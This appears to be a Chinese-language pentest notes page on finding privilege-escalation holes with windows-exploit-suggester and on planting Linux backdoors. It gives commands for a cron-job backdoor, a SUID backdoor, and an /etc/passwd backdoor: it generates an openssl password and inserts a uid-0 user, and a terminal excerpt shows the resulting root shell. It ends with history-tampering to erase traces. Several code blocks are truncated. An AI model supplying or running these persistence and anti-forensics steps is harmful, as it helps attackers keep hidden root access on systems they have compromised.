用脚本探测linux提权漏洞
windows漏洞探测脚本:
python2和python3的区别:
python2 打印函数print不需要括号: print “hello”;python3打印函数需要print(“hello”)
python2-pip安装:
python2 get-pip.py
python3-pip安装:
apt-get install python3-pip
脚本使用:
漏洞库位置: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-022
下载漏洞库: python2 windows-exploit-suggester.py –update
保存systeminfo信息: systeminfo > sys.txt
探测漏洞: python2 windows-exploit-suggester.py -i sys.txt -d 2021-03-28-mssb.xls
linux脚本探测:
1 | 下载: |
linux后门植入
计划任务:
用命令的方式写计划任务
crontab -e
crontab -l –> 查看计划任务
再文件中写入计划任务
文件位置: /etc/crontab
1 | # Example of job definition: |
命令的形式:
创建计划任务: crontab -e –> * * * * * command
删除计划任务: crontab -r | crontab -ri –> -r 删除 -i 交互(问你是否删除)
创建suid后门:
1 | /tmp: 存放临时文件的目录,具有高权限 |
/etc/passwd后门:
生成有效密码: openssl passwd 密码
插入有效数据: echo 用户名:密码:0:0:system:/root:/bin/bash
登入用户:su 用户名
┌─[✗]─[ilu@parrot]─[/tmp]
└──╼ $su hello
密码:
┌─[root@parrot]─[/tmp]
└──╼ #
痕迹清除
1 | sed -i 's/^HISTSIZE=原数量(默认1000)/HISTSIZE=目标数量/' ~/.bashrc |